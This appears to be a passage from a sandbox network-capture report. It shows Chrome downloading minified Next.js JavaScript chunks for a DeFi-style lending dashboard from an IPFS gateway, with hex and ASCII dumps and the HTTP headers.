                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 35 30 34 5d 2c 7b 38 39 37 32 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 38 37 34 36 32 29 2c 6f 3d 72 28 36 33 33 36 36 29 2c 69 3d 72 28 36 37 32 39 34 29 2c 61 3d 72 28 38 36 30 31 30 29 2c 73 3d 72 28 39 34 37 38 30 29 2c 6c 3d 72 28 38 31 37 31 39 29 2c 63 3d 72 28 37 38 38 38 34 29 2c 75 3d 72 28 33 36 36 32 32 29 2c 64 3d 72 28 33 34 38 36 37 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 72 65 74 75 72 6e 28
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6504],{89722:function(e,t,r){r.d(t,{Z:function(){return b}});var n=r(87462),o=r(63366),i=r(67294),a=r(86010),s=r(94780),l=r(81719),c=r(78884),u=r(36622),d=r(34867);function m(e){return(
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 73 61 62 6c 65 64 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 2c 69 6e 68 65 72 69 74 3a 76 6f 69 64 20 30 7d 5b 74 2e 63 6f 6c 6f 72 5d 7d 29 29 29 2c 68 3d 69 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 63 6f 6e 73 74 20 72 3d 28 30 2c 63 2e 5a 29 28 7b 70 72 6f 70 73 3a 65 2c 6e 61 6d 65 3a 22 4d 75 69 49 63 6f 6e 22 7d 29 2c 7b 62 61 73 65 43 6c 61 73 73 4e 61 6d 65 3a 69 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 6c 2c 63 6f 6c 6f 72 3a 64 3d 22 69 6e 68 65 72 69 74 22 2c 63 6f 6d 70 6f 6e 65 6e 74 3a 68 3d 22 73 70 61 6e 22 2c 66 6f 6e 74 53 69 7a 65 3a 62 3d 22 6d 65 64 69 75 6d 22 7d 3d 72 2c 79 3d 28 30 2c
                                                                                                                                                                                                                                                  Data Ascii: sabled:(e.vars||e).palette.action.disabled,inherit:void 0}[t.color]}))),h=i.forwardRef((function(e,t){const r=(0,c.Z)({props:e,name:"MuiIcon"}),{baseClassName:i="material-icons",className:l,color:d="inherit",component:h="span",fontSize:b="medium"}=r,y=(0,
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 72 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 64 3d 5b 22 22 2c 22 4b 22 2c 22 4d 22 2c 22 42 22 2c 22 54 22 2c 22 50 22 2c 22 45 22 2c 22 5a 22 2c 22 59 22 5d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 76 61 6c 75 65 2c 72 3d 65 2e 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 32 3a 72 2c 6f 3d 65 2e 72 6f 75 6e 64 44 6f 77 6e 2c 61 3d 65 2e 63 6f 6d 70 61 63 74 54 68 72 65 73 68 6f 6c 64 2c 73 3d 28 30 2c 69 2e 68 45 29 28 74 29
                                                                                                                                                                                                                                                  Data Ascii: ).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var d=["","K","M","B","T","P","E","Z","Y"],m=function(e){var t=e.value,r=e.visibleDecimals,n=void 0===r?2:r,o=e.roundDown,a=e.compactThreshold,s=(0,i.hE)(t)
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 7c 68 2e 76 61 72 69 61 6e 74 2c 63 6f 6c 6f 72 3a 6d 7c 7c 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 2c 63 68 69 6c 64 72 65 6e 3a 22 3c 22 7d 29 2c 22 75 73 64 22 3d 3d 3d 28 6e 75 6c 6c 3d 3d 3d 72 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 26 26 21 63 26 26 28 30 2c 73 2e 6a 73 78 29 28 61 2e 5a 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 73 70 61 6e 22 2c 73 78 3a 7b 6d 72 3a 2e 35 7d 2c 76 61 72 69 61 6e 74 3a 64 7c 7c 68 2e 76 61 72 69 61 6e 74 2c 63 6f 6c 6f 72 3a 6d 7c 7c 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 2c 63 68 69 6c 64 72 65 6e 3a 22 24 22 7d 29 2c 6a 3f 28 30 2c 73 2e 6a 73 78 29 28 70 2c 7b 76 61 6c 75 65 3a 78 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a
                                                                                                                                                                                                                                                  Data Ascii: |h.variant,color:m||"text.secondary",children:"<"}),"usd"===(null===r||void 0===r?void 0:r.toLowerCase())&&!c&&(0,s.jsx)(a.Z,{component:"span",sx:{mr:.5},variant:d||h.variant,color:m||"text.secondary",children:"$"}),j?(0,s.jsx)(p,{value:x,visibleDecimals:
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 68 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 72 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 79 28 65 29 7b 76 61 72 20 74 3d 65 2e 73 79 6d 62 6f 6c 2c 72 3d 65 2e 6f 6e 49 6d 61 67 65 47 65 6e 65 72 61 74 65 64 2c 6e 3d 65 2e 61 54 6f 6b 65 6e 2c 6f 3d 28 30 2c 63 2e 75 73 65 52 65 66 29
                                                                                                                                                                                                                                                  Data Ascii: iptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):h(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}function y(e){var t=e.symbol,r=e.onImageGenerated,n=e.aToken,o=(0,c.useRef)
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 74 6f 6b 65 6e 73 2f 22 2e 63 6f 6e 63 61 74 28 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 22 2e 73 76 67 22 29 2c 6f 6e 4c 6f 61 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 28 21 31 29 7d 7d 29 2c 6e 26 26 28 30 2c 64 2e 6a 73 78 29 28 67 2c 7b 72 65 66 3a 69 7d 29 5d 7d 29 7d 76 61 72 20 67 3d 28 30 2c 63 2e 66 6f 72 77 61 72 64 52 65 66 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 65 2e 73 79 6d 62 6f 6c 3b 72 65 74 75 72 6e 28 30 2c 64 2e 6a 73 78 73 29 28 22 73 76 67 22 2c 7b 73 74 79 6c 65 3a 7b 70 6f 73 69 74 69 6f 6e 3a 22 61 62 73 6f 6c 75 74 65 22 2c 74 6f 70 3a 30 2c 6c 65 66 74 3a 30 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 68 65 69 67 68 74 3a 22 31 30 30 25 22 7d 2c 72 65 66 3a 74 2c 69 64 3a
                                                                                                                                                                                                                                                  Data Ascii: tokens/".concat(t.toLowerCase(),".svg"),onLoad:function(){return l(!1)}}),n&&(0,d.jsx)(g,{ref:i})]})}var g=(0,c.forwardRef)((function(e,t){var r=e.symbol;return(0,d.jsxs)("svg",{style:{position:"absolute",top:0,left:0,width:"100%",height:"100%"},ref:t,id:
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 2e 34 20 31 32 38 2e 39 37 37 20 31 32 38 2e 39 37 37 20 30 20 30 20 31 20 31 32 38 20 32 35 36 7a 6d 30 2d 32 34 32 2e 32 38 37 61 31 31 35 2e 31 34 35 20 31 31 35 2e 31 34 35 20 30 20 30 20 30 2d 32 33 2e 30 33 33 20 32 2e 33 32 32 41 31 31 33 2e 36 35 37 20 31 31 33 2e 36 35 37 20 30 20 30 20 30 20 36 34 2e 31 20 33 33 2e 32 33 32 61 31 31 34 2e 36 32 32 20 31 31 34 2e 36 32 32 20 30 20 30 20 30 2d 34 31 2e 34 20 35 30 2e 32 38 33 20 31 31 33 2e 37 20 31 31 33 2e 37 20 30 20 30 20 30 2d 36 2e 36 35 39 20 32 31 2e 34 35 32 20 31 31 35 2e 34 20 31 31 35 2e 34 20 30 20 30 20 30 20 30 20 34 36 2e 30 36 35 20 31 31 33 2e 36 36 20 31 31 33 2e 36 36 20 30 20 30 20 30 20 31 37 2e 32 20 34 30 2e 38 36 36 20 31 31 34 2e 36 32 37 20 31 31 34 2e 36 32 37 20 30 20
                                                                                                                                                                                                                                                  Data Ascii: .4 128.977 128.977 0 0 1 128 256zm0-242.287a115.145 115.145 0 0 0-23.033 2.322A113.657 113.657 0 0 0 64.1 33.232a114.622 114.622 0 0 0-41.4 50.283 113.7 113.7 0 0 0-6.659 21.452 115.4 115.4 0 0 0 0 46.065 113.66 113.66 0 0 0 17.2 40.866 114.627 114.627 0
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 78 29 28 22 69 6d 67 22 2c 7b 73 72 63 3a 22 64 65 66 61 75 6c 74 22 21 3d 3d 73 26 26 72 3f 72 3a 22 2f 69 63 6f 6e 73 2f 74 6f 6b 65 6e 73 2f 64 65 66 61 75 6c 74 2e 73 76 67 22 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 68 65 69 67 68 74 3a 22 31 30 30 25 22 2c 61 6c 74 3a 22 22 2e 63 6f 6e 63 61 74 28 74 2c 22 20 69 63 6f 6e 22 29 2c 6f 6e 45 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 28 22 64 65 66 61 75 6c 74 22 29 7d 7d 29 7d 29 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 65 29 7b 76 61 72 20 74 3d 65 2e 73 79 6d 62 6f 6c 73 2c 72 3d 65 2e 62 61 64 67 65 53 79 6d 62 6f 6c 2c 6e 3d 28 30 2c 69 2e 5a 29 28 65 2c 66 29 3b 72 65 74 75 72 6e 20 72 3f 28 30 2c 64 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 62 61 64 67 65 43 6f 6e 74 65
                                                                                                                                                                                                                                                  Data Ascii: x)("img",{src:"default"!==s&&r?r:"/icons/tokens/default.svg",width:"100%",height:"100%",alt:"".concat(t," icon"),onError:function(){return l("default")}})})}))}function j(e){var t=e.symbols,r=e.badgeSymbol,n=(0,i.Z)(e,f);return r?(0,d.jsx)(l.Z,{badgeConte
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 28 30 2c 66 2e 7a 29 28 29 2e 70 6f 6f 6c 54 6f 6b 65 6e 73 42 61 6c 61 6e 63 65 53 65 72 76 69 63 65 3b 72 65 74 75 72 6e 28 30 2c 6d 2e 68 29 28 7b 71 75 65 72 69 65 73 3a 65 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 76 28 4f 62 6a 65 63 74 28 72 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28 30 2c 64 2e 5a 29 28 65 2c 74 2c 72 5b 74 5d 29
                                                                                                                                                                                                                                                  Data Ascii: h=function(e,t,r){var n=(0,f.z)().poolTokensBalanceService;return(0,m.h)({queries:e.map((function(e){return function(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?v(Object(r),!0).forEach((function(t){(0,d.Z)(e,t,r[t])


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  69192.168.2.549787209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC739OUTGET /_next/static/chunks/8019-7233b42ab9ef6fe6.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:45 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 13675
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreihdd2frqehs4kha5it6epwlp33lfvnaagixfkywfdqnimiam3cxe4"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/8019-7233b42ab9ef6fe6.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreihdd2frqehs4kha5it6epwlp33lfvnaagixfkywfdqnimiam3cxe4
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 690709
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 62 31 38 31 61 34 33 34 61 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42b181a434a-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1305INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 30 31 39 5d 2c 7b 34 35 38 38 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 6f 3d 72 28 33 30 31 32 30 29 2c 6e 3d 72 28 38 35 38 39 33 29 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 69 73 52 6f 77 2c 72 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 69 3d 65 2e 6d 69 6e 57 69 64 74 68 2c 73 3d 65 2e 6d 61 78 57 69 64 74 68 2c 61 3d 65 2e 61 6c 69 67 6e 2c 6c 3d 76 6f 69 64 20 30 3d 3d 3d 61 3f 22 63 65 6e 74 65 72 22
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8019],{45884:function(e,t,r){r.d(t,{h:function(){return i}});var o=r(30120),n=r(85893),i=function(e){var t=e.isRow,r=e.children,i=e.minWidth,s=e.maxWidth,a=e.align,l=void 0===a?"center"
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 72 28 72 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 72 3d 65 2e 6d 69 6e 48 65 69 67 68 74 2c 6f 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 37 31 3a 72 2c 6c 3d 65 2e 70 78 2c 75 3d 76 6f 69 64 20 30 3d 3d 3d 6c 3f 34 3a 6c 2c 64 3d 65 2e 62 75 74 74 6f 6e 2c 70 3d 28 30 2c 6e 2e 5a 29 28 65 2c 61 29 3b 72 65 74 75 72 6e 28 30 2c 73 2e 6a 73 78 29 28 69 2e 5a 2c 63 28 63 28 7b 7d 2c 70 29 2c 7b 7d 2c 7b 73 78 3a 63 28 63 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 6d 69 6e 48 65 69 67 68 74 3a 6f 2c 70 78 3a 75 2c 22 26 3a 6e 6f 74 28 3a 6c 61 73 74 2d 63 68 69 6c 64 29 22 3a 7b 62 6f
                                                                                                                                                                                                                                                  Data Ascii: r(r,t))}))}return e}var u=function(e){var t=e.children,r=e.minHeight,o=void 0===r?71:r,l=e.px,u=void 0===l?4:l,d=e.button,p=(0,n.Z)(e,a);return(0,s.jsx)(i.Z,c(c({},p),{},{sx:c(c({display:"flex",alignItems:"center",minHeight:o,px:u,"&:not(:last-child)":{bo
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 74 65 6d 28 72 29 29 2c 4f 3d 6a 5b 30 5d 2c 49 3d 6a 5b 31 5d 2c 44 3d 28 30 2c 63 2e 59 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 72 61 63 6b 45 76 65 6e 74 7d 29 29 2c 53 3d 4f 26 26 21 76 3b 72 65 74 75 72 6e 28 30 2c 70 2e 6a 73 78 73 29 28 69 2e 5a 2c 7b 73 78 3a 66 28 7b 6d 74 3a 6d 3f 34 3a 30 2c 62 6f 72 64 65 72 3a 31 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 22 64 69 76 69 64 65 72 22 7d 2c 77 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 70 2e 6a 73 78 73 29 28 73 2e 5a 2c 7b 73 78 3a 66 28 7b 70 78 3a 7b 78 73 3a 34 2c 78 73 6d 3a 36 7d 2c 70 79 3a 7b 78 73 3a 33 2e 35 2c 78 73 6d 3a 34 7d 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 6a 75 73 74 69 66
                                                                                                                                                                                                                                                  Data Ascii: tem(r)),O=j[0],I=j[1],D=(0,c.Y)((function(e){return e.trackEvent})),S=O&&!v;return(0,p.jsxs)(i.Z,{sx:f({mt:m?4:0,border:1,borderColor:"divider"},w),children:[(0,p.jsxs)(s.Z,{sx:f({px:{xs:4,xsm:6},py:{xs:3.5,xsm:4},display:"flex",alignItems:"center",justif
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 44 61 73 68 62 6f 61 72 64 54 61 62 6c 65 43 6f 6c 6c 61 70 73 65 22 3a 44 28 75 2e 68 31 2e 54 49 4c 45 5f 56 49 53 42 49 4c 49 54 59 2c 7b 76 69 73 69 62 69 6c 69 74 79 3a 22 48 69 64 64 65 6e 22 2c 74 79 70 65 3a 22 41 76 61 69 6c 61 62 6c 65 20 42 6f 72 72 6f 77 20 41 73 73 65 74 73 22 7d 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 62 6f 72 72 6f 77 65 64 41 73 73 65 74 73 44 61 73 68 62 6f 61 72 64 54 61 62 6c 65 43 6f 6c 6c 61 70 73 65 22 3a 44 28 75 2e 68 31 2e 54 49 4c 45 5f 56 49 53 42 49 4c 49 54 59 2c 7b 76 69 73 69 62 69 6c 69 74 79 3a 22 48 69 64 64 65 6e 22 2c 74 79 70 65 3a 22 42 6f 72 72 6f 77 65 64 20 41 73 73 65 74 73 22 7d 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 75 70 70 6c 79 41 73 73 65 74 73 44 61 73 68 62 6f 61 72 64 54 61 62 6c 65 43
                                                                                                                                                                                                                                                  Data Ascii: DashboardTableCollapse":D(u.h1.TILE_VISBILITY,{visibility:"Hidden",type:"Available Borrow Assets"});break;case"borrowedAssetsDashboardTableCollapse":D(u.h1.TILE_VISBILITY,{visibility:"Hidden",type:"Borrowed Assets"});break;case"supplyAssetsDashboardTableC
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6f 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 63 28 4f 62 6a 65 63 74 28 72 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28 30 2c 6f 2e 5a 29 28 65 2c 74 2c 72 5b 74 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62
                                                                                                                                                                                                                                                  Data Ascii: numerable}))),r.push.apply(r,o)}return r}function u(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?c(Object(r),!0).forEach((function(t){(0,o.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Ob
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 77 3d 67 3f 79 3a 6d 2c 6a 3d 21 31 21 3d 3d 69 26 26 28 69 7c 7c 6d 3e 39 39 39 39 39 29 3b 72 65 74 75 72 6e 20 66 26 26 21 6a 26 26 28 77 3d 4d 61 74 68 2e 74 72 75 6e 63 28 4e 75 6d 62 65 72 28 77 29 2a 4d 61 74 68 2e 70 6f 77 28 31 30 2c 76 29 29 2f 4d 61 74 68 2e 70 6f 77 28 31 30 2c 76 29 29 2c 28 30 2c 61 2e 6a 73 78 73 29 28 73 2e 5a 2c 75 28 75 28 7b 7d 2c 78 29 2c 7b 7d 2c 7b 73 78 3a 75 28 7b 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 72 6f 77 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 70 6f 73 69 74 69 6f 6e 3a 22 72 65 6c 61 74 69 76 65 22 7d 2c 78 2e 73 78 29 2c 6e 6f 57 72 61 70 3a 21 30 2c 63 68 69 6c 64 72 65 6e 3a 5b 67 26 26 28 30 2c 61 2e 6a 73
                                                                                                                                                                                                                                                  Data Ascii: w=g?y:m,j=!1!==i&&(i||m>99999);return f&&!j&&(w=Math.trunc(Number(w)*Math.pow(10,v))/Math.pow(10,v)),(0,a.jsxs)(s.Z,u(u({},x),{},{sx:u({display:"inline-flex",flexDirection:"row",alignItems:"center",position:"relative"},x.sx),noWrap:!0,children:[g&&(0,a.js
